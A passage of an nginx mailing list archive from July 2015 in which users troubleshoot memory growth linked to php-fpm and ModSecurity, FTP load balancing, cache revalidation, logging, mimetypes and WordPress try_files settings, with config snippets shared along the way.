> it stop there and then all websites fall but nginx not, only after i reset
> nginx all back to normal for 1-2hours again.
>
> how can i debug where the problem? or try find the problem? seems in logs i
> not see anything
>

Could you provide "nginx -V" output?

wbr, Valentin V. Bartenev

From nginx-forum at nginx.us Tue Jul 7 17:12:42 2015
From: nginx-forum at nginx.us (evgeni22)
Date: Tue, 07 Jul 2015 13:12:42 -0400
Subject: leaking memory nginx 1.8.0
In-Reply-To: <3335299.BWqfcoXYiD@vbart-workstation>
References: <3335299.BWqfcoXYiD@vbart-workstation>
Message-ID: <05295b8005401f3a0dff43d8fff17e58.NginxMailingListEnglish@forum.nginx.org>

$ nginx -V
nginx version: nginx/1.8.0
built by gcc 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC)
built with OpenSSL 1.0.1e-fips 11 Feb 2013
TLS SNI support enabled
configure arguments: --add-module=../modsecurity_nginx-2.8.0/nginx/modsecurity --user=nginx --group=nginx --prefix=/usr --sbin-path=/usr/sbin --conf-path=/etc/nginx/nginx.conf --pid-path=/var/run/nginx.pid --http-log-path=/var/log/nginx/access_log --error-log-path=/var/log/nginx/error_log --with-ipv6 --without-mail_imap_module --without-mail_smtp_module --with-http_ssl_module --with-http_realip_module --with-http_stub_status_module --with-http_gzip_static_module --with-http_dav_module --with-cc-opt=''-D FD_SETSIZE=32768''

i not sure yet but 4 last hours seems leak stopped after i stop security_mod, can be the security_mod doing this leaking in nginx ?

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260106,260118#msg-260118

From vbart at nginx.com Tue Jul 7 17:19:09 2015
From: vbart at nginx.com (Valentin V. Bartenev)
Date: Tue, 07 Jul 2015 20:19:09 +0300
Subject: leaking memory nginx 1.8.0
In-Reply-To: <05295b8005401f3a0dff43d8fff17e58.NginxMailingListEnglish@forum.nginx.org>
References: <3335299.BWqfcoXYiD@vbart-workstation> <05295b8005401f3a0dff43d8fff17e58.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <3497464.ifCHdAZQAx@vbart-workstation>

On Tuesday 07 July 2015 13:12:42 evgeni22 wrote:
> $ nginx -V
> nginx version: nginx/1.8.0
> built by gcc 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC)
> built with OpenSSL 1.0.1e-fips 11 Feb 2013
> TLS SNI support enabled
> configure arguments:
> --add-module=../modsecurity_nginx-2.8.0/nginx/modsecurity --user=nginx
> --group=nginx --prefix=/usr --sbin-path=/usr/sbin
> --conf-path=/etc/nginx/nginx.conf --pid-path=/var/run/nginx.pid
> --http-log-path=/var/log/nginx/access_log
> --error-log-path=/var/log/nginx/error_log --with-ipv6
> --without-mail_imap_module --without-mail_smtp_module --with-http_ssl_module
> --with-http_realip_module --with-http_stub_status_module
> --with-http_gzip_static_module --with-http_dav_module --with-cc-opt=''-D
> FD_SETSIZE=32768''
>
>
> i not sure yet but 4 last hours seems leak stopped after i stop
> security_mod, can be the security_mod doing this leaking in nginx ?
>
[..]

I'm sure it can.

wbr, Valentin V. Bartenev

From nginx-forum at nginx.us Tue Jul 7 19:37:32 2015
From: nginx-forum at nginx.us (evgeni22)
Date: Tue, 07 Jul 2015 15:37:32 -0400
Subject: leaking memory nginx 1.8.0
In-Reply-To: <3497464.ifCHdAZQAx@vbart-workstation>
References: <3497464.ifCHdAZQAx@vbart-workstation>
Message-ID: <2d404d6479feac8d99092ced31ec4eba.NginxMailingListEnglish@forum.nginx.org>

ok need help, it not security_mod, it begin grow again. when server begin activate, i mean users begin upload files or replace files the memory increase immediately and not going down after they finish. now the server ate 12gb of ram, if i do reset to nginx it going down to 4.5gb ram.

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260106,260122#msg-260122

From nginx-forum at nginx.us Tue Jul 7 19:47:56 2015
From: nginx-forum at nginx.us (itpp2012)
Date: Tue, 07 Jul 2015 15:47:56 -0400
Subject: leaking memory nginx 1.8.0
In-Reply-To: <2d404d6479feac8d99092ced31ec4eba.NginxMailingListEnglish@forum.nginx.org>
References: <3497464.ifCHdAZQAx@vbart-workstation> <2d404d6479feac8d99092ced31ec4eba.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <5d04cb1d3c998ac63a035ebd3b87c790.NginxMailingListEnglish@forum.nginx.org>

Show us the nginx.conf, maybe you're using some weird large value somewhere.

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260106,260123#msg-260123

From nginx-forum at nginx.us Tue Jul 7 20:02:41 2015
From: nginx-forum at nginx.us (evgeni22)
Date: Tue, 07 Jul 2015 16:02:41 -0400
Subject: leaking memory nginx 1.8.0
In-Reply-To: <5d04cb1d3c998ac63a035ebd3b87c790.NginxMailingListEnglish@forum.nginx.org>
References: <3497464.ifCHdAZQAx@vbart-workstation> <2d404d6479feac8d99092ced31ec4eba.NginxMailingListEnglish@forum.nginx.org> <5d04cb1d3c998ac63a035ebd3b87c790.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <72628dbac7c21eb822c83bbe8684be3b.NginxMailingListEnglish@forum.nginx.org>

This my hardware server:
Processor Intel Xeon E3 1225v2
Cores/Threads 4 cores/ 4 threads
Frequency 3.2 GHz+
RAM 32GB DDR3
Disks 3 x 120 GB SSD
=========================================
the config is nginx.conf:

#user nginx;

# The number of worker processes is changed automatically by CustomBuild, according to the number of CPU core$
worker_processes 4;
pid /var/run/nginx.pid;
error_log /var/logs//nginx/error.log;
#error_log logs/error.log notice;
#error_log logs/error.log info;

events {
    include /etc/nginx/nginx-events.conf;
}

http {
    include /etc/nginx/mime.types;

    # access_log /var/log/nginx/access.log main;

    # For user configurations not maintained by DirectAdmin. Empty by default.
    include /etc/nginx/nginx-includes.conf;

    # Supplemental configuration
    include /etc/nginx/nginx-modsecurity-enable.conf;
    include /etc/nginx/nginx-defaults.conf;
    include /etc/nginx/nginx-gzip.conf;
    include /etc/nginx/directadmin-ips.conf;
    include /etc/nginx/directadmin-settings.conf;
    include /etc/nginx/nginx-vhosts.conf;
    include /etc/nginx/directadmin-vhosts.conf;
}
==========================================
config for nginx-defaults.conf:

default_type application/octet-stream;
tcp_nopush on;
tcp_nodelay on;
sendfile on;
log_format bytes '$bytes_sent $request_length';
keepalive_timeout 2;
types_hash_max_size 2048;
disable_symlinks if_not_owner from=$document_root;
server_tokens off;
client_max_body_size 1024m;
client_body_timeout 3m;
client_body_buffer_size 128k;
client_header_timeout 20;
client_header_buffer_size 3m;
large_client_header_buffers 4 256k;
send_timeout 20;
proxy_connect_timeout 600s;
proxy_send_timeout 600s;
proxy_read_timeout 600s;
proxy_buffer_size 128k;
proxy_buffers 4 256k;
proxy_busy_buffers_size 256k;
fastcgi_send_timeout 600s;
fastcgi_read_timeout 600s;
server_names_hash_bucket_size 128;
server_names_hash_max_size 10240;
ssl_dhparam /etc/nginx/ssl.crt/dhparams.pem;

## Anti ddos
limit_conn_zone $binary_remote_addr zone=conn_limit_per_ip:10m;
limit_req_zone $binary_remote_addr zone=req_limit_per_ip:10m rate=5r/s;
================================
config for nginx-gzip.conf

gzip on;
gzip_static on;
gzip_disable "msie6";
gzip_http_version 1.1;
gzip_vary on;
gzip_comp_level 6;
gzip_proxied any;
gzip_types text/plain text/css application/json application/x-javascript text/xml application/xml application$
gzip_buffers 16 8k;
gzip_min_length 10;
gzip_disable "MSIE [1-6]\.(?!.*SV1)";
===================================
config for nginx/directadmin-ips.conf:

server {
    listen xx.xx.xx.xx:80 default_server; # i hide the ip
    server_name _;
    root /home/admin/domains/sharedip;
    index index.html index.htm index.php;

    include /usr/local/directadmin/data/users/admin/nginx_php.conf;

    # deny access to apache .htaccess files
    location ~ /\.ht {
        deny all;
    }

    include /etc/nginx/webapps.conf;
}

server {
    listen xx.xx.xx.xx:443 default_server; # i hide the ip
    server_name _;

    ssl on;
    ssl_certificate /etc/nginx/ssl.crt/server.crt.combined;
    ssl_certificate_key /etc/nginx/ssl.key/server.key;
    ssl_session_cache shared:SSL:10m;
    ssl_session_timeout 5m;
    ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
    ssl_ciphers HIGH:!aNULL:!MD5;
    ssl_prefer_server_ciphers on;

    root /home/admin/domains/sharedip;
    index index.html index.htm index.php;

    include /usr/local/directadmin/data/users/admin/nginx_php.conf;

    # deny access to apache .htaccess files
    location ~ /\.ht {
        deny all;
    }

    include /etc/nginx/webapps.conf;
}
===========================
config for directadmin-settings.conf: empty
===========================
config for nginx-vhosts.conf

server {
    listen xx.xx.xx.x:80; # i hide the ip
    listen 127.0.0.1:80;
    #listen [::1]:80;
    server_name $hostname xx.xx.xx.xx; # i hide the ip

    root /var/www/html;
    index index.html index.htm index.php;

    #Support UserDir (~/user/)
    location ~^/~(?<userdir_user>.+?)(?<userdir_uri>/.*)?$ {
        alias /home/$userdir_user/public_html$userdir_uri;
        index index.html index.htm index.php;
        autoindex on;

        location ~ \.php$ {
            fastcgi_split_path_info ^(.+\.php)(/.+)$;
            include /etc/nginx/fastcgi_params;
            fastcgi_index index.php;
            #try_files does not work after alias directive
            if (!-f $request_filename) {
                return 404;
            }
            fastcgi_param DOCUMENT_ROOT /home/$userdir_user/public_html;
            fastcgi_param SCRIPT_FILENAME $request_filename;
            fastcgi_pass unix:/usr/local/php54/sockets/$userdir_user.sock;
        }
    }

    # Pass all .php files onto a php-fpm/php-fcgi server.
    location ~ \.php$ {
        try_files $uri =404;
        fastcgi_split_path_info ^(.+\.php)(/.+)$;
        include /etc/nginx/fastcgi_params;
        fastcgi_index index.php;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_pass unix:/usr/local/php54/sockets/webapps.sock;
    }

    include /etc/nginx/nginx-info.conf;
    include /etc/nginx/webapps.conf;
}

# HTTPS server
#
server {
    listen xx.xx.xx.xx:443 ssl; # i hide the ip
    listen 127.0.0.1:443 ssl;
    #listen [::1]:443 ssl;
    server_name $hostname xx.xx.xx.xx; # i hide the ip

    ssl on;
    ssl_certificate /etc/nginx/ssl.crt/server.crt.combined;
    ssl_certificate_key /etc/nginx/ssl.key/server.key;
    ssl_session_cache shared:SSL:10m;
    ssl_session_timeout 10m;
    ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
    ssl_ciphers HIGH:!aNULL:!MD5;
    ssl_prefer_server_ciphers on;

    root /var/www/html;
    index index.html index.htm index.php;

    #Support UserDir (~/user/)
    location ~^/~(?<userdir_user>.+?)(?<userdir_uri>/.*)?$ {
        alias /home/$userdir_user/private_html$userdir_uri;
        index index.html index.htm index.php;
        autoindex on;

        location ~ \.php$ {
            fastcgi_split_path_info ^(.+\.php)(/.+)$;
            include /etc/nginx/fastcgi_params;
            fastcgi_index index.php;
            #try_files does not work after alias directive
            if (!-f $request_filename) {
                return 404;
            }
            fastcgi_param DOCUMENT_ROOT /home/$userdir_user/private_html;
            fastcgi_param SCRIPT_FILENAME $request_filename;
            fastcgi_pass unix:/usr/local/php54/sockets/$userdir_user.sock;
        }
    }

    # Pass all .php files onto a php-fpm/php-fcgi server.
    location ~ \.php$ {
        try_files $uri =404;
        fastcgi_split_path_info ^(.+\.php)(/.+)$;
        include /etc/nginx/fastcgi_params;
        fastcgi_index index.php;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_pass unix:/usr/local/php54/sockets/webapps.sock;
    }

    include /etc/nginx/nginx-info.conf;
    include /etc/nginx/webapps.ssl.conf;
}
====================================
config for directadmin-vhosts.conf: for individual clients i think not matter it empty there.
=================================
config for: nginx/nginx-info.conf

location /nginx_status {
    # Enable nginx status page
    stub_status on;
    # Disable status page logging in access_log
    access_log off;
    # Allow access from 127.0.0.1
    allow 127.0.0.1;
    # Deny all the other connections
    deny all;
}
=========================
security_mod disabled now. but the config is
nginx-modsecurity-enable.conf:

ModSecurityEnabled on;
ModSecurityConfig /etc/nginx/nginx-modsecurity.conf;
============================

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260106,260124#msg-260124

From r at roze.lv Tue Jul 7 21:11:39 2015
From: r at roze.lv (Reinis Rozitis)
Date: Wed, 8 Jul 2015 00:11:39 +0300
Subject: leaking memory nginx 1.8.0
In-Reply-To: <72628dbac7c21eb822c83bbe8684be3b.NginxMailingListEnglish@forum.nginx.org>
References: <3497464.ifCHdAZQAx@vbart-workstation> <2d404d6479feac8d99092ced31ec4eba.NginxMailingListEnglish@forum.nginx.org> <5d04cb1d3c998ac63a035ebd3b87c790.NginxMailingListEnglish@forum.nginx.org> <72628dbac7c21eb822c83bbe8684be3b.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <6622BB01720145F09597076CACC17FB3@MezhRoze>

> security_mod disabled now. but the config is
> nginx-modsecurity-enable.conf:
>
> ModSecurityEnabled on;
> ModSecurityConfig /etc/nginx/nginx-modsecurity.conf;

Did you disable the module just via configuration or did a full vanilla nginx recompile, because the module could be still hooking in requests.

Also 2.8.0 seems a bit "oldish" since it's been released more than a year ago https://github.com/SpiderLabs/ModSecurity/releases

Besides there are existing / confirmed memory leaks: https://github.com/SpiderLabs/ModSecurity/issues/895 ..
and this discussion also might be related: https://github.com/SpiderLabs/ModSecurity/issues/785

rr

From r at roze.lv Tue Jul 7 21:20:57 2015
From: r at roze.lv (Reinis Rozitis)
Date: Wed, 8 Jul 2015 00:20:57 +0300
Subject: leaking memory nginx 1.8.0
In-Reply-To: <6622BB01720145F09597076CACC17FB3@MezhRoze>
References: <3497464.ifCHdAZQAx@vbart-workstation> <2d404d6479feac8d99092ced31ec4eba.NginxMailingListEnglish@forum.nginx.org> <5d04cb1d3c998ac63a035ebd3b87c790.NginxMailingListEnglish@forum.nginx.org> <72628dbac7c21eb822c83bbe8684be3b.NginxMailingListEnglish@forum.nginx.org> <6622BB01720145F09597076CACC17FB3@MezhRoze>
Message-ID: <6077686BD3FB4BC09C0D7ABC52C2B0D4@MezhRoze>

> nginx recompile, because the module could be still hooking in requests.

Did read a bit further in the thread and could even confirm this:

"ModSecurity using resources even if it is disabled" https://github.com/SpiderLabs/ModSecurity/issues/644

which leads to "nginx: Returning 500 if SecRuleEngine is set to Off" https://github.com/SpiderLabs/ModSecurity/issues/645

which is kind of fixed in https://github.com/SpiderLabs/ModSecurity/commit/fe14d9df4d590e348a8ee232e4b318fc5e5a87f8 tagged as 2.9.0-rc2 so way after the version you use.

rr

From zhanght1 at lenovo.com Wed Jul 8 03:02:47 2015
From: zhanght1 at lenovo.com (Felix HT1 Zhang)
Date: Wed, 8 Jul 2015 03:02:47 +0000
Subject: Nginx SFTP/FTP loadbalancer
Message-ID: <3B8195E42ECF3D4DA1072EF35B4F39F8C13D0D00@CNMAILEX03.lenovo.com>

Dears,
This is Felix which is from Lenovo. I need your kindly help of nginx.
Here is one question of nginx SFTP/FTP loadbalancer.
The backend is two machines 10.96.144.195/10.96.144.196 service IP is 10.96.144.197 which have some http,https,SFTP and FTP service.
The frontend systems send some data to 10.96.144.195/10.96.144.196 by 10.96.144.197.
Now we want to use nginx to do the loadbalancer which dispatch the http,https,SFTP and FTP to 10.96.144.195/10.96.144.196 not by 10.96.144.197.
I could configure the nginx.conf to loadbalancer the http and https service.
But how to loadbalancer SFTP and FTP service?
Could you give me one configuration example for SFTP and FTP service?

BR
Felix zhang

From pchychi at gmail.com Wed Jul 8 04:52:51 2015
From: pchychi at gmail.com (Payam Chychi)
Date: Tue, 7 Jul 2015 21:52:51 -0700
Subject: Nginx SFTP/FTP loadbalancer
In-Reply-To: <3B8195E42ECF3D4DA1072EF35B4F39F8C13D0D00@CNMAILEX03.lenovo.com>
References: <3B8195E42ECF3D4DA1072EF35B4F39F8C13D0D00@CNMAILEX03.lenovo.com>
Message-ID:

Hi,

You would proxy pass to the backend. Lookup how the smtp is done with nginx.

Personally I use nginx for http based and haproxy for any other tcp based load balancing, I've had some great success in this method.

--
Payam Chychi
Network Engineer / Security Specialist

On Tuesday, July 7, 2015 at 8:02 PM, Felix HT1 Zhang wrote:

> Dears,
> This is Felix which is from Lenovo.I need your kindly help of nginx.
> Here is one question of nginx SFTP/FTP loadbalancer.
> The backend is two machines 10.96.144.195/10.96.144.196 service IP is 10.96.144.197 which have some http,https,SFTP and FTP service.
> The frontend systems send some data to 10.96.144.195/10.96.144.196 by 10.96.144.197.
> Now we want to use nginx to do the loadbalancer which dispatch the http,https,SFTP and FTP to 10.96.144.195/10.96.144.196 not by 10.96.144.197.
> I could configure the nginx.conf to loadbalancer the http and https service.
> But how to loadbalancer SFTP and FTP service?
> Could you give me one configuration example for SFTP and FTP service?
> BR
> Felix zhang
>
>
> _______________________________________________
> nginx mailing list
> nginx at nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx
>
>

From nginx-forum at nginx.us Wed Jul 8 06:22:05 2015
From: nginx-forum at nginx.us (evgeni22)
Date: Wed, 08 Jul 2015 02:22:05 -0400
Subject: leaking memory nginx 1.8.0
In-Reply-To: <6077686BD3FB4BC09C0D7ABC52C2B0D4@MezhRoze>
References: <6077686BD3FB4BC09C0D7ABC52C2B0D4@MezhRoze>
Message-ID: <02e4952d9952aeb7ae40c7bed77c81d8.NginxMailingListEnglish@forum.nginx.org>

"nginx recompile, because the module could be still hooking in requests."

security_mod disabled it not tracker after any domains on the server it can't hooking requests if it not tracking after domains because memory leaking only when clients do traffic with domains. i for sure now it not security_mod problem

and about version i use mod_security it last one
Current rules version 1.11 (Latest version)
CWAF plugin version 2.11 (Latest version)

i thinking of php-fpm problems with nginx, i google a little and saw people complain about leaking in nginx who have php-fpm

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260106,260130#msg-260130

From nginx-forum at nginx.us Wed Jul 8 06:57:48 2015
From: nginx-forum at nginx.us (evgeni22)
Date: Wed, 08 Jul 2015 02:57:48 -0400
Subject: leaking memory nginx 1.8.0
In-Reply-To: <6077686BD3FB4BC09C0D7ABC52C2B0D4@MezhRoze>
References: <6077686BD3FB4BC09C0D7ABC52C2B0D4@MezhRoze>
Message-ID: <88c5539650bc73f054bfc83a45392a27.NginxMailingListEnglish@forum.nginx.org>

wondering if it good config in php-fpm

pm = ondemand
pm.max_children = 10
pm.process_idle_timeout = 60
pm.max_requests = 1000

?

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260106,260131#msg-260131

From nginx-forum at nginx.us Wed Jul 8 07:44:32 2015
From: nginx-forum at nginx.us (evgeni22)
Date: Wed, 08 Jul 2015 03:44:32 -0400
Subject: leaking memory nginx 1.8.0
In-Reply-To: <88c5539650bc73f054bfc83a45392a27.NginxMailingListEnglish@forum.nginx.org>
References: <6077686BD3FB4BC09C0D7ABC52C2B0D4@MezhRoze> <88c5539650bc73f054bfc83a45392a27.NginxMailingListEnglish@forum.nginx.org>
Message-ID:

ok the leaking fixed , i will paste here for database for other users:

that was in my php-fpm.conf

pm = ondemand
pm.max_children = 10
pm.process_idle_timeout = 60
pm.max_requests = 1000

=============================
after i change it to this conf the leaking stopped.

pm = dynamic
pm.max_children = 10
pm.start_servers = 5
pm.min_spare_servers = 5
pm.max_spare_servers = 10
pm.max_requests = 500

i only not understand why pm = ondemand doing the leaking, does algorithm in nginx not stable or it php issue ?

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260106,260132#msg-260132

From champetier.etienne at gmail.com Wed Jul 8 09:13:40 2015
From: champetier.etienne at gmail.com (Etienne Champetier)
Date: Wed, 8 Jul 2015 11:13:40 +0200
Subject: fastcgi retry upstream (transparent php-fpm restart)?
Message-ID:

Hi,

I'm using nginx with 1 php-fpm (via unix socket), and I'm wondering if there is a way to make nginx retry on error, something like fastcgi_next_upstream but for the same upstream.
I would like to be able to transparently restart php-fpm and not send some 502 to the clients

So, is there a way to make nginx retry the same upstream for X seconds (or retry every Y seconds for max Z attempts or ...) (on errors like "connect() failed (111: Connection refused) while connecting to upstream") ?

I'm open to any tricks

Thanks in advance
Etienne

p.s: I already know about atomic/transparent php deployment with "$realpath_root" and multiple docroot ( https://github.com/zendtech/ZendOptimizerPlus/issues/126#issuecomment-24020445 )

From r at roze.lv Wed Jul 8 12:46:32 2015
From: r at roze.lv (Reinis Rozitis)
Date: Wed, 8 Jul 2015 15:46:32 +0300
Subject: leaking memory nginx 1.8.0
In-Reply-To:
References: <6077686BD3FB4BC09C0D7ABC52C2B0D4@MezhRoze> <88c5539650bc73f054bfc83a45392a27.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <7D583A379A784B85AB0C6ACA270FB588@MezhRoze>

> i only not understand why pm = ondemand doing the leaking, does algorithm
> in nginx not stable or it php issue ?

It contradicts your previous mails about nginx processes being the leak point.

php(-fpm) and nginx are separate pieces of software (just communicating via fastcgi protocol) so if the php leaks memory it's a problem on php side (is also very valid considering that not all of the (third-party) php extensions are memory-friendly).

rr

From frederik.nosi at postecom.it Wed Jul 8 14:33:36 2015
From: frederik.nosi at postecom.it (Frederik Nosi)
Date: Wed, 8 Jul 2015 16:33:36 +0200
Subject: leaking memory nginx 1.8.0
In-Reply-To:
References: <6077686BD3FB4BC09C0D7ABC52C2B0D4@MezhRoze> <88c5539650bc73f054bfc83a45392a27.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <559D34C0.4020504@postecom.it>

Hi,

On 07/08/2015 09:44 AM, evgeni22 wrote:
> ok the leaking fixed , i will paste here for database for other users:
>
> that was in my php-fpm.conf
>
> pm = ondemand
> pm.max_children = 10
> pm.process_idle_timeout = 60
> pm.max_requests = 1000
>
> =============================
> after i change it to this conf the leaking stopped.
>
> pm = dynamic
> pm.max_children = 10
> pm.start_servers = 5
> pm.min_spare_servers = 5
> pm.max_spare_servers = 10
> pm.max_requests = 500

Very probably that last setting helped you, from the documentation:

pm.max_requests int
The number of requests each child process should execute before respawning. This can be useful to work around memory leaks in 3rd party libraries. For endless request processing specify '0'. Equivalent to PHP_FCGI_MAX_REQUESTS. Default value: 0.

IMHO It's a bandaid, but works.

>
> i only not understand why pm = ondemand doing the leaking, does algorithm
> in nginx not stable or it php issue ?
>
> Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260106,260132#msg-260132
>
> _______________________________________________
> nginx mailing list
> nginx at nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx

From nginx-forum at nginx.us Thu Jul 9 01:43:33 2015
From: nginx-forum at nginx.us (Alt)
Date: Wed, 08 Jul 2015 21:43:33 -0400
Subject: *_cache_revalidate directives
Message-ID: <09fab71fe8ea34cccaefbed6e9e49628.NginxMailingListEnglish@forum.nginx.org>

Hello,

From the documentation, I don't understand how the fastcgi_cache_revalidate (or scgi_cache_revalidate or proxy_cache_revalidate or uwsgi_cache_revalidate) works.
Please, can someone explain what nginx does when cache is enabled and the revalidate directive is set to "on"?

Best Regards

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260148,260148#msg-260148

From arut at nginx.com Thu Jul 9 07:30:48 2015
From: arut at nginx.com (Roman Arutyunyan)
Date: Thu, 9 Jul 2015 10:30:48 +0300
Subject: *_cache_revalidate directives
In-Reply-To: <09fab71fe8ea34cccaefbed6e9e49628.NginxMailingListEnglish@forum.nginx.org>
References: <09fab71fe8ea34cccaefbed6e9e49628.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <08393E7E-0756-46F5-8A5E-72EDE9BE4FEE@nginx.com>

Hello,

> On 09 Jul 2015, at 04:43, Alt wrote:
>
> Hello,
>
> From the documentation, I don't understand how the fastcgi_cache_revalidate
> (or scgi_cache_revalidate or proxy_cache_revalidate or
> uwsgi_cache_revalidate) works.
> Please, can someone explain what nginx does when cache is enabled and the
> revalidate directive is set to "on"?

Normally, when a cache entry is expired in nginx cache, nginx fetches a replacement from upstream. If cache revalidation is enabled, nginx asks the upstream if the current (expired) entry is still valid using "If-Modified-Since" and "If-None-Match" HTTP headers. The upstream can reply with "304 Not Modified" to confirm the validity. In this case the entry remains in cache until it expires again.

--
Roman Arutyunyan

From nginx-forum at nginx.us Thu Jul 9 07:59:04 2015
From: nginx-forum at nginx.us (Alt)
Date: Thu, 09 Jul 2015 03:59:04 -0400
Subject: *_cache_revalidate directives
In-Reply-To: <08393E7E-0756-46F5-8A5E-72EDE9BE4FEE@nginx.com>
References: <08393E7E-0756-46F5-8A5E-72EDE9BE4FEE@nginx.com>
Message-ID: <2620d3f626dba9186106345859617cf4.NginxMailingListEnglish@forum.nginx.org>

Hello Roman,

Thanks for the explanation.
At which moment this revalidation is executed? When there's a new client request or is it done automatically when a cache entry is about to expire?
The nginx's cache manager is deleting expiring cache file, so I'm not sure to understand how it all works.

Best Regards

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260148,260151#msg-260151

From arut at nginx.com Thu Jul 9 08:32:22 2015
From: arut at nginx.com (Roman Arutyunyan)
Date: Thu, 9 Jul 2015 11:32:22 +0300
Subject: *_cache_revalidate directives
In-Reply-To: <2620d3f626dba9186106345859617cf4.NginxMailingListEnglish@forum.nginx.org>
References: <08393E7E-0756-46F5-8A5E-72EDE9BE4FEE@nginx.com> <2620d3f626dba9186106345859617cf4.NginxMailingListEnglish@forum.nginx.org>
Message-ID:

Hello,

> On 09 Jul 2015, at 10:59, Alt wrote:
>
> Hello Roman,
>
> Thanks for the explanation.
> At which moment this revalidation is executed? When there's a new client
> request or is it done automatically when a cache entry is about to expire?

When there's a client request. Nginx does not do any background cache updates/revalidations/etc.

> The nginx's cache manager is deleting expiring cache file, so I'm not sure
> to understand how it all works.

Nginx cache manager has nothing to do with cache entry expiration. In fact, it does 2 things:

* deletes files which were not accessed for the "inactive" time
* deletes old files to keep cache within "max_size"

http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_cache_path

--
Roman Arutyunyan

From black.fledermaus at arcor.de Thu Jul 9 09:57:54 2015
From: black.fledermaus at arcor.de (basti)
Date: Thu, 09 Jul 2015 11:57:54 +0200
Subject: Do not log "directory index of /foo/bar/ is forbidden"
Message-ID: <559E45A2.1070607@arcor.de>

Hello,

I have found "conditional logging" in http://nginx.org/en/docs/http/ngx_http_log_module.html
It seems that it only works on status codes.
Is there a way to disable logging for something like:

2015/07/09 11:02:30 [error] 24928#0: *97983 directory index of "/foo/bar/" is forbidden, client: xx.xxx.xx.xx, server: www.example.com, request: "GET / HTTP/1.1", host: "www.example.com"

nginx version: nginx/1.9.1

Best Regards,
basti

From nginx at tengu.ch Fri Jul 10 06:00:06 2015
From: nginx at tengu.ch (Cédric Jeanneret)
Date: Fri, 10 Jul 2015 08:00:06 +0200
Subject: Wrong mimetype when served from nginx
Message-ID: <559F5F66.2010408@tengu.ch>

Hello,

I have a small issue with my nginx (1.2.1) configuration: some files are served as "application/octet-stream" while they are detected as "text/plain" by "mimetype " command.

File names are just "1", "2", and so on.

Is there a way to enforce mimetype for those files? I thought about something like this:

location ~ /path/to/file/[0-9]+ {
    types {}
    default_type text/plain;
}

but after that, I get a 404 ? what did I wrong?

Thanks for your support!

Cheers,

C.

From nginx-forum at nginx.us Fri Jul 10 11:17:18 2015
From: nginx-forum at nginx.us (Alt)
Date: Fri, 10 Jul 2015 07:17:18 -0400
Subject: *_cache_revalidate directives
In-Reply-To:
References:
Message-ID:

Hello,

Thanks again Roman for the explanation and link!

Best Regards

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260148,260179#msg-260179

From reallfqq-nginx at yahoo.fr Fri Jul 10 13:39:20 2015
From: reallfqq-nginx at yahoo.fr (B.R.)
Date: Fri, 10 Jul 2015 15:39:20 +0200
Subject: nginx on Debian: dynamic network interfaces
In-Reply-To:
References:
Message-ID:

On Wed, May 27, 2015 at 6:40 PM, itpp2012 wrote:

> > Will you make everyone using nginx on Debian using
> > that
> > trick, as soon as they need DNS on a default 'hotplug' interface with
> > sysvinit?
>
> No I'd make everyone use IP addresses with the EBLB I've introduced a while
> ago with sources. For a fast acting webservice DNS is outdated,
> outperformed
> and is only useful for clients. If it was up to me I'd rip dns out
> completely from nginx.
>

Then I am one of the many glad that this is not up to you.

@nginx
Will you do anything to adapt to the new way on handling services asynchronously? on Debian or not?

(As a side note, and as reported here multiple times by different people, OpenID through Google does not work, so I was unable to fill up a bug there. Would you provide a way of creating accounts on your PKI?)

Thanks,
---
*B. R.*

From nginx at netdirect.fr Fri Jul 10 15:16:31 2015
From: nginx at netdirect.fr (Artur)
Date: Fri, 10 Jul 2015 17:16:31 +0200
Subject: try_files setup
Message-ID: <559FE1CF.6010703@netdirect.fr>

Hello,

I'm quite new to the advanced nginx configuration so I will need your help. :)

I'm currently working on a nginx + php5-fpm (chrooted) + wordpress setup.
My basic setup works fine but I wanted to improve the try_files section.
My main concern is to correctly take in charge URIs by nginx or php5-fpm depending on their types and existence.

My current setup for wordpress with nice permalinks (http://host/wordpress_page/) :

location / {
    root /content/chroot/htdocs;
    index index.php index.html index.htm;
    try_files $uri $uri/ /index.php?$args;
}

location ~ \.php$ {
    include fastcgi_params;
    root /htdocs;
    fastcgi_pass 127.0.0.1:1234;
    fastcgi_param SCRIPT_FILENAME $document_root$request_filename;
}

error_page 404 /404.html;
#location = /404.html {
#    root /usr/share/nginx/html;
#}

error_page 500 502 503 504 /50x.html;
location = /50x.html {
    root /usr/share/nginx/html;
}

The main problem is that if I try to get a non existing php file (http://host/nonexisting.php) I get always "No input file specified." fpm error. I'd like to redirect here to a 404 error page instead.

In case I call a different non existing file (nonexisting.jpg) I get an error displayed from Wordpress saying this page does not exist.
I suppose this is correct in a wordpress setup because of the permalinks setup I described above.

Any help will be appreciate. :)

--
Best regards,
Artur.

From mandre at eso.org Fri Jul 10 16:01:30 2015
From: mandre at eso.org (Mathias Andre)
Date: Fri, 10 Jul 2015 18:01:30 +0200
Subject: Lost connection after reading 2147479552 bytes with sendfile
Message-ID: <20150710160130.GB16679@eso.org>

Hi!

I've bumped into a strange problem lately, and though I've found a workaround I thought I'd post here to try and understand what the underlying issue can be in case it affects anyone else.

The short version is:
